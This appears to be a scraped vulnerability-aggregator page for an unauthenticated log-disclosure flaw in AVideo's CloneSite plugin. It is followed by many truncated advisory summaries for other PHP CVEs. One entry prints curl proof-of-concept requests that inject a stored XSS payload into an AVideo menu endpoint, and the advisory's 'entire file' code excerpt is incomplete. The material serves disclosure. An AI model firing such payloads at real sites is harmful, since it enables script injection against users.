CVE-2026-35452
published 2026-04-06CVE-2026-35452: WWBN AVideo is an open source video platform. In versions 26.0 and prior, the plugin/CloneSite/client.log.php endpoint serves the clone operation log file…
PriorityP432medium5.3CVSS 3.1
AVNACLPRNUINSUCLINAN
EPSS
0.37%
28.6th percentile
WWBN AVideo is an open source video platform. In versions 26.0 and prior, the plugin/CloneSite/client.log.php endpoint serves the clone operation log file without any authentication. Every other endpoint in the CloneSite plugin directory enforces User::isAdmin(). The log contains internal filesystem paths, remote server URLs, and SSH connection metadata.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| wwbn | avideo | <= 26.0 | — |
| wwbn | avideo | 0 – 26.0 | — |
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
AVideo: Unauthenticated Information Disclosure via Missing Auth on CloneSite client.log.php
ghsa·2026-04-04
CVE-2026-35452 [MEDIUM] CWE-200 AVideo: Unauthenticated Information Disclosure via Missing Auth on CloneSite client.log.php
AVideo: Unauthenticated Information Disclosure via Missing Auth on CloneSite client.log.php
## Summary
The `plugin/CloneSite/client.log.php` endpoint serves the clone operation log file without any authentication. Every other endpoint in the CloneSite plugin directory enforces `User::isAdmin()`. The log contains internal filesystem paths, remote server URLs, and SSH connection metadata.
## Details
The entire file at `plugin/CloneSite/client.log.php`:
```php
add("Clone (2 of {$totalSteps}): Geting MySQL Dump file [$cmd]");
```
The `$cmd` variable contains wget commands with internal filesystem paths, and rsync command templates with SSH connection details (username, IP, port).
Compare with sibling endpoints:
- `plugin/CloneSite/index.php` checks `User::isAdmin()`
- `plugin/CloneSite/
OSV
AVideo: Unauthenticated Information Disclosure via Missing Auth on CloneSite client.log.php
osv·2026-04-04
CVE-2026-35452 [MEDIUM] AVideo: Unauthenticated Information Disclosure via Missing Auth on CloneSite client.log.php
AVideo: Unauthenticated Information Disclosure via Missing Auth on CloneSite client.log.php
## Summary
The `plugin/CloneSite/client.log.php` endpoint serves the clone operation log file without any authentication. Every other endpoint in the CloneSite plugin directory enforces `User::isAdmin()`. The log contains internal filesystem paths, remote server URLs, and SSH connection metadata.
## Details
The entire file at `plugin/CloneSite/client.log.php`:
```php
add("Clone (2 of {$totalSteps}): Geting MySQL Dump file [$cmd]");
```
The `$cmd` variable contains wget commands with internal filesystem paths, and rsync command templates with SSH connection details (username, IP, port).
Compare with sibling endpoints:
- `plugin/CloneSite/index.php` checks `User::isAdmin()`
- `plugin/CloneSite/
No detection rules found.
No public exploits indexed.
Wiz
CVE-2026-34368 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-34368 [MEDIUM] CVE-2026-34368 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34368 :
PHP vulnerability analysis and mitigation
transferBalance()
plugin/YPTWallet/YPTWallet.php
Source : NVD
## 5.3
Score
Published March 27, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 8.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity MEDIUM No Fix Added at: Mar 31, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related PHP vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has fix
Published
Wiz
CVE-2026-29113 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 2.3
CVE-2026-29113 [LOW] CVE-2026-29113 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-29113 :
PHP vulnerability analysis and mitigation
Craft is a content management system (CMS). Prior to 4.17.4 and 5.9.7, Craft CMS has a CSRF issue in the preview token endpoint at /actions/preview/create-token. The endpoint accepts an attacker-supplied previewToken. Because the action does not require POST and does not enforce a CSRF token, an attacker can force a logged-in victim editor to mint a preview token chosen by the attacker. That token can then be used by the attacker (without authentication) to access previewed/unpublished content tied to the victim’s authorized preview scope. This vulnerability is fixed in 4.17.4 and 5.9.7.
Source : NVD
## 2.3
Score
Published March 10, 2026
Severity LOW
CNA Score 2.3
Affected Technologies
PHP
Craft CMS
Has Public Expl
Wiz
CVE-2026-25488 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.1
CVE-2026-25488 [MEDIUM] CVE-2026-25488 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25488 :
PHP vulnerability analysis and mitigation
Craft Commerce is an ecommerce platform for Craft CMS. In versions from 4.0.0-RC1 to 4.10.0 and from 5.0.0 to 5.5.1, a stored XSS vulnerability in Craft Commerce allows attackers to execute malicious JavaScript in an administrator’s browser. This occurs because the Tax Categories (Name & Description) fields in the Store Management section are not properly sanitized before being displayed in the admin panel. This issue has been patched in versions 4.10.1 and 5.5.2.
Source : NVD
## 6.1
Score
Published February 3, 2026
Severity MEDIUM
CNA Score 6.1
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 4.5
Wiz
CVE-2026-25486 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.1
CVE-2026-25486 [MEDIUM] CVE-2026-25486 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25486 :
PHP vulnerability analysis and mitigation
Craft Commerce is an ecommerce platform for Craft CMS. From version 5.0.0 to 5.5.1, a stored XSS vulnerability in Craft Commerce allows attackers to execute malicious JavaScript in an administrator’s browser. This occurs because the Shipping Methods Name field in the Store Management section is not properly sanitized before being displayed in the admin panel. This issue has been patched in version 5.5.2.
Source : NVD
## 6.1
Score
Published February 3, 2026
Severity MEDIUM
CNA Score 6.1
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 4.1
Exploitation Probability (EPSS) N/A
Affected packages and li
Wiz
CVE-2026-25495 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.7
CVE-2026-25495 [HIGH] CVE-2026-25495 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25495 :
PHP vulnerability analysis and mitigation
Craft is a platform for creating digital experiences. In Craft versions 4.0.0-RC1 through 4.16.17 and 5.0.0-RC1 through 5.8.21, the element-indexes/get-elements endpoint is vulnerable to SQL Injection via the criteria[orderBy] parameter (JSON body). The application fails to sanitize this input before using it in the database query. An attacker with Control Panel access can inject arbitrary SQL into the ORDER BY clause by omitting viewState[order] (or setting both to the same payload). This issue is patched in versions 4.16.18 and 5.8.22.
Source : NVD
## 8.7
Score
Published February 9, 2026
Severity HIGH
CNA Score 8.7
Affected Technologies
PHP
Craft CMS
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Relea
Wiz
CVE-2026-32278 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.2
CVE-2026-32278 [HIGH] CVE-2026-32278 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-32278 :
PHP vulnerability analysis and mitigation
Connect-CMS is a content management system. In versions on the 1.x series up to and including 1.41.0 and versions on the 2.x series up to and including 2.41.0, a Stored Cross-site Scripting (XSS) issue exists in the file field of the Form Plugin. Versions 1.41.1 and 2.41.1 contain a patch.
Source : NVD
## 4.8
Score
Published March 23, 2026
Severity MEDIUM
CNA Score 8.2
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 12.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
opensource-workshop/connect-cms
Sources
NVD
Composer Severity HIGH Has Fix Added at: Mar 24, 2026
## Get
Wiz
GHSA-gmpc-fxg2-vcmq Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
GHSA-gmpc-fxg2-vcmq Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-gmpc-fxg2-vcmq :
PHP vulnerability analysis and mitigation
## Summary
htmlspecialchars()
## Details
HTMLMenuRight.php:24
">
HTMLMenuRight.php:40
">
HTMLMenuLeft.php:32
">
index.php:49
getText(); ?>
menuItemSave.json.php
menuItemSave.json.php
User::isAdmin()
isGlobalTokenValid()
## Proof of Concept
As an admin user, save a menu item with a malicious icon class:
curl -b "PHPSESSID=ADMIN_SESSION" \
-X POST "https://your-avideo-instance.com/plugin/TopMenu/menuItemSave.json.php" \
-d 'icon=fa-home" onmouseover="alert(document.cookie)&text=Home&url=/&status=a'
Alternatively, inject via the URL field to create a JavaScript link:
curl -b "PHPSESSID=ADMIN_SESSION" \
-X POST "https://your-avideo-instance.com/plugin/TopMenu/menuItemSave.json.php" \
-d 'icon=fa-link&t
Wiz
CVE-2026-33295 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.2
CVE-2026-33295 [HIGH] CVE-2026-33295 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33295 :
PHP vulnerability analysis and mitigation
clean_title
Source : NVD
## 8.2
Score
Published March 22, 2026
Severity HIGH
CNA Score 8.2
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity HIGH No Fix Added at: Mar 20, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related PHP vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has fix
Published date
GHSA-h6rj-3m53-887h
HIGH
7.5
PHP
Wiz
CVE-2026-34564 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.1
CVE-2026-34564 [CRITICAL] CVE-2026-34564 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34564 :
PHP vulnerability analysis and mitigation
CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to version 0.31.0.0, the application fails to properly sanitize user-controlled input when adding Pages to navigation menus through the Menu Management functionality. Page-related data selected via the Pages section is stored server-side and rendered without proper output encoding. This stored payload is later rendered unsafely within administrative interfaces and public-facing navigation menus, leading to stored DOM-based cross-site scripting (XSS). This issue has been patched in version 0.31.0.0.
Source : NVD
## 9.1
Score
Published April 1, 2026
Severity CRITICAL
CNA Scor
Wiz
CVE-2026-33501 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-33501 [MEDIUM] CVE-2026-33501 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33501 :
PHP vulnerability analysis and mitigation
plugin/Permissions/View/Users_groups_permissions/list.json.php
add.json.php
delete.json.php
index.php
User::isAdmin()
Source : NVD
## 5.3
Score
Published March 23, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 35.4
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity MEDIUM No Fix Added at: Mar 21, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related PHP vulnerabilities:
CVE ID
Severity
Wiz
CVE-2026-27697 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.9
CVE-2026-27697 [MEDIUM] CVE-2026-27697 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27697 :
PHP vulnerability analysis and mitigation
baserCMS is a website development framework. Prior to version 5.2.3, baserCMS has a SQL injection vulnerability in blog posts. This issue has been patched in version 5.2.3.
Source : NVD
## 6.9
Score
Published March 31, 2026
Severity MEDIUM
CNA Score 6.9
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 10.6
Exploitation Probability (EPSS) N/A
Affected packages and libraries
baserproject/basercms
Sources
NVD
Composer Severity MEDIUM Has Fix Added at: Apr 02, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's l
Wiz
CVE-2026-23524 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.8
CVE-2026-23524 [CRITICAL] CVE-2026-23524 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23524 :
PHP vulnerability analysis and mitigation
Laravel Reverb provides a real-time WebSocket communication backend for Laravel applications. In versions 1.6.3 and below, Reverb passes data from the Redis channel directly into PHP’s unserialize() function without restricting which classes can be instantiated, which leaves users vulnerable to Remote Code Execution. The exploitability of this vulnerability is increased because Redis servers are commonly deployed without authentication, but only affects Laravel Reverb when horizontal scaling is enabled (REVERB_SCALING_ENABLED=true). This issue has been fixed in version 1.7.0. As a workaround, require a strong password for Redis access and ensure the service is only accessible via a private network or local loopback, and/or set
Wiz
GHSA-hr7j-63v7-vj7g Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
GHSA-hr7j-63v7-vj7g Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-hr7j-63v7-vj7g :
PHP vulnerability analysis and mitigation
## Summary
Deleting a user account with SFTP access or changing the user's password does not immediately terminate existing SFTP sessions, allowing continued filesystem access after credentials are revoked.
This can result in unintended and unauthorized access to server files even after administrators believe access has been fully invalidated.
## Details
When a user with SFTP access is deleted from the Pterodactyl Panel or when the user's password is changed while one or more SFTP connections are active, those existing connections remain fully functional.
Neither account deletion nor password change invalidates the authentication state of already-established SFTP sessions. As a result, the active SFTP connection poo
Wiz
CVE-2026-33485 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2026-33485 [HIGH] CVE-2026-33485 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33485 :
PHP vulnerability analysis and mitigation
on_publish
plugin/Live/on_publish.php
$_POST['name']
LiveTransmitionHistory::getLatest()
LiveTransmition::keyExists()
Source : NVD
## 7.5
Score
Published March 23, 2026
Severity HIGH
CNA Score 7.5
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 43.1
Exploitation Probability (EPSS) 0.2
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity HIGH No Fix Added at: Mar 21, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related PHP vulnerabilities:
CVE ID
Severity
Scor
Wiz
CVE-2026-25129 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.7
CVE-2026-25129 [MEDIUM] CVE-2026-25129 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25129 :
PHP vulnerability analysis and mitigation
.psysh.php
.psysh.php
php artisan tinker
.psysh.php
Source : NVD
## 7.3
Score
Published January 30, 2026
Severity HIGH
CNA Score 6.7
Affected Technologies
PHP
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 0.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
psy/psysh
psysh
Sources
NVD
Composer Severity MEDIUM Has Fix Added at: Jan 31, 2026
Homebrew Severity HIGH Has Fix Added at: Mar 03, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related PHP vulnerabilities:
CVE ID
Severit
Wiz
CVE-2026-33499 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.1
CVE-2026-33499 [MEDIUM] CVE-2026-33499 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33499 :
PHP vulnerability analysis and mitigation
view/forbiddenPage.php
view/warningPage.php
$_REQUEST['unlockPassword']
value
Source : NVD
## 6.1
Score
Published March 23, 2026
Severity MEDIUM
CNA Score 6.1
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.5
Exploitation Probability (EPSS) N/A
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity MEDIUM No Fix Added at: Mar 21, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related PHP vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA
Wiz
CVE-2026-31820 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.1
CVE-2026-31820 [HIGH] CVE-2026-31820 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-31820 :
PHP vulnerability analysis and mitigation
Sylius is an Open Source eCommerce Framework on Symfony. An authenticated Insecure Direct Object Reference (IDOR) vulnerability exists in multiple shop LiveComponents due to unvalidated resource IDs accepted via #[LiveArg] parameters. Unlike props, which are protected by LiveComponent's @checksum, args are fully user-controlled - any action that accepts a resource ID via #[LiveArg] and loads it with ->find() without ownership validation is vulnerable. Checkout address FormComponent (addressFieldUpdated action): Accepts an addressId via #[LiveArg] and loads it without verifying ownership, exposing another user's first name, last name, company, phone number, street, city, postcode, and country. Cart WidgetComponent (refreshCart
Wiz
CVE-2026-27127 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.0
CVE-2026-27127 [HIGH] CVE-2026-27127 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27127 :
PHP vulnerability analysis and mitigation
Source : NVD
## 7
Score
Published February 24, 2026
Severity HIGH
CNA Score 7.0
Affected Technologies
PHP
Craft CMS
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.4
Exploitation Probability (EPSS) N/A
Affected packages and libraries
craftcms/cms
cpe:2.3:a:craftcms:craft_cms
Sources
Composer Severity HIGH Has Fix Added at: Feb 24, 2026
Linux Severity MEDIUM Has Fix Added at: Feb 24, 2026
Windows Severity MEDIUM Has Fix Added at: Feb 24, 2026
Linux Severity MEDIUM Has Fix Added at: Mar 03, 2026
Windows Severity MEDIUM Has Fix Added at: Mar 03, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs i
Wiz
CVE-2025-67857 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.3
CVE-2025-67857 [MEDIUM] CVE-2025-67857 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-67857 :
PHP vulnerability analysis and mitigation
A flaw was found in moodle. During anonymous assignment submissions, user identifiers were inadvertently exposed in URLs. This data exposure allows unauthorized viewers to see internal user IDs, compromising the intended anonymity and potentially leading to information disclosure.
Source : NVD
## 5.3
Score
Published February 3, 2026
Severity MEDIUM
CNA Score 4.3
Affected Technologies
PHP
NixOS
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
moodle/moodle
moodle
Sources
NVD
Composer Severity MEDIUM Has Fix Added at: Feb 04, 2026
Nix Severity MEDIUM
Wiz
CVE-2025-55988 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.2
CVE-2025-55988 [HIGH] CVE-2025-55988 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-55988 :
PHP vulnerability analysis and mitigation
An issue in the component /Controllers/RestController.php of DreamFactory Core v1.0.3 allows attackers to execute a directory traversal via an unsanitized URI path.
Source : NVD
## 7.2
Score
Published March 20, 2026
Severity HIGH
CNA Score 7.2
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 28.7
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
dreamfactory/df-core
Sources
NVD
Composer Severity HIGH Has Fix Added at: Mar 21, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## R
Wiz
CVE-2026-25496 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.8
CVE-2026-25496 [MEDIUM] CVE-2026-25496 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25496 :
PHP vulnerability analysis and mitigation
Craft is a platform for creating digital experiences. In Craft versions 4.0.0-RC1 through 4.16.17 and 5.0.0-RC1 through 5.8.21, a stored XSS vulnerability exists in the Number field type settings. The Prefix and Suffix fields are rendered using the |md|raw Twig filter without proper escaping, allowing script execution when the Number field is displayed on users' profiles. This issue is patched in versions 4.16.18 and 5.8.22.
Source : NVD
## 4.8
Score
Published February 9, 2026
Severity MEDIUM
CNA Score 4.8
Affected Technologies
PHP
Craft CMS
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5.3
Exploitation Probability (EPS
Wiz
CVE-2026-34362 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.4
CVE-2026-34362 [MEDIUM] CVE-2026-34362 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34362 :
PHP vulnerability analysis and mitigation
verifyTokenSocket()
plugin/YPTSocket/functions.php
Source : NVD
## 5.4
Score
Published March 27, 2026
Severity MEDIUM
CNA Score 5.4
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 8.4
Exploitation Probability (EPSS) N/A
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity MEDIUM No Fix Added at: Mar 31, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related PHP vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has fix
Publish
Wiz
CVE-2025-67852 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 3.5
CVE-2025-67852 [LOW] CVE-2025-67852 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-67852 :
PHP vulnerability analysis and mitigation
A flaw was found in Moodle. An open redirect vulnerability in the OAuth login flow allows a remote attacker to redirect users to attacker-controlled pages after they have successfully authenticated. This occurs due to insufficient validation of redirect parameters, which could lead to phishing attacks or information disclosure.
Source : NVD
## 6.1
Score
Published February 3, 2026
Severity MEDIUM
CNA Score 3.5
Affected Technologies
PHP
NixOS
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 2.5
Exploitation Probability (EPSS) N/A
Affected packages and libraries
moodle
moodle/moodle
Sources
NVD
Composer Severity LOW Has
Wiz
GHSA-gp56-f67f-m4px Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
GHSA-gp56-f67f-m4px Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-gp56-f67f-m4px :
PHP vulnerability analysis and mitigation
Summary A critical vulnerability has been identified in CI4MS that allows an authenticated user with file editor permissions to achieve Remote Code Execution (RCE). By leveraging the file creation and save endpoints, an attacker can upload and execute arbitrary PHP code on the server. Vulnerability Details The vulnerability exists in the /backend/fileeditor/createFile and /backend/fileeditor/save API endpoints.
Unrestricted File Creation: The createFile endpoint allows users to create files with any extension (including .php) in web-accessible directories such as /public.
Arbitrary Content Injection: The save endpoint allows users to write arbitrary content into the created files without sufficient server-side validation
Wiz
CVE-2024-42718 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.5
CVE-2024-42718 [MEDIUM] CVE-2024-42718 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2024-42718 :
PHP vulnerability analysis and mitigation
A path traversal vulnerability in Croogo CMS 4.0.7 allows remote attackers to read arbitrary files via a specially crafted path in the 'edit-file' parameter.
Source : NVD
## 6.5
Score
Published December 26, 2025
Severity MEDIUM
CNA Score 6.5
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 6.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
croogo/croogo
Sources
NVD
Composer Severity HIGH No Fix Added at: Dec 28, 2025
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related PHP
Wiz
CVE-2026-33674 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 2.0
CVE-2026-33674 [LOW] CVE-2026-33674 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33674 :
PHP vulnerability analysis and mitigation
PrestaShop is an open source e-commerce web application. Versions prior to 8.2.5 and 9.1.0 improperly use the validation framework. Versions 8.2.5 and 9.1.0 contain a fix. No known workarounds are available.
Source : NVD
## 5.3
Score
Published March 26, 2026
Severity MEDIUM
CNA Score 2.0
Affected Technologies
PHP
Prestashop
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 32.2
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
cpe:2.3:a:prestashop:prestashop
prestashop/prestashop
Sources
Composer Severity LOW Has Fix Added at: Mar 26, 2026
Linux Severity MEDIUM Has Fix Added at: Mar 29, 2026
Windows
Wiz
CVE-2026-33887 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.4
CVE-2026-33887 [MEDIUM] CVE-2026-33887 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33887 :
PHP vulnerability analysis and mitigation
Statamic is a Laravel and Git powered content management system (CMS). Prior to versions 5.73.16 and 6.7.2, authenticated Control Panel users could view entry revisions for any collection with revisions enabled, regardless of whether they had the required collection permissions. This bypasses the authorization checks that the main entry controllers enforce, exposing entry field values and blueprint data. Users could also create entry revisions without edit permission, though this only snapshots the existing content state and does not affect published content. This has been fixed in 5.73.16 and 6.7.2.
Source : NVD
## 5.4
Score
Published March 27, 2026
Severity MEDIUM
CNA Score 5.4
Affected Technologies
PHP
Has Public
Wiz
CVE-2026-35543 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-35543 [MEDIUM] CVE-2026-35543 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-35543 :
PHP vulnerability analysis and mitigation
An issue was discovered in Roundcube Webmail before 1.5.14 and 1.6.14. The remote image blocking feature can be bypassed via SVG content (with animate attributes) in an e-mail message. This may lead to information disclosure or access-control bypass.
Source : NVD
## 5.3
Score
Published April 3, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
PHP
Linux Debian
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 10.1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
roundcube
roundcube/roundcubemail
Sources
NVD
Debian 11, 12, 13, 14 Severity MEDIUM Has Fix Added at: Apr 05, 2026
Echo Severity MED
Wiz
CVE-2026-35035 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.2
CVE-2026-35035 [HIGH] CVE-2026-35035 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-35035 :
PHP vulnerability analysis and mitigation
CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to 0.31.2.0 , the application fails to properly sanitize user-controlled input within System Settings – Company Information. Several administrative configuration fields accept attacker-controlled input that is stored server-side and later rendered without proper output encoding. These values are persisted in the database and rendered unsafely on public-facing pages only, such as the main landing page. There is no execution in the administrative dashboard—the vulnerability only impacts the public frontend. This vulnerability is fixed in 0.31.2.0.
Source : NVD
## 7.2
Score
Publ
Wiz
CVE-2026-25489 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.1
CVE-2026-25489 [MEDIUM] CVE-2026-25489 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25489 :
PHP vulnerability analysis and mitigation
Craft Commerce is an ecommerce platform for Craft CMS. In versions from 4.0.0-RC1 to 4.10.0 and from 5.0.0 to 5.5.1, a stored XSS vulnerability in Craft Commerce allows attackers to execute malicious JavaScript in an administrator’s browser. This occurs because the Name & Description fields in Tax Zones are not properly sanitized before being displayed in the admin panel. This issue has been patched in versions 4.10.1 and 5.5.2.
Source : NVD
## 6.1
Score
Published February 3, 2026
Severity MEDIUM
CNA Score 6.1
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 4.5
Exploitation Probability (EPSS) N/A
Wiz
CVE-2026-32612 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.4
CVE-2026-32612 [MEDIUM] CVE-2026-32612 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-32612 :
PHP vulnerability analysis and mitigation
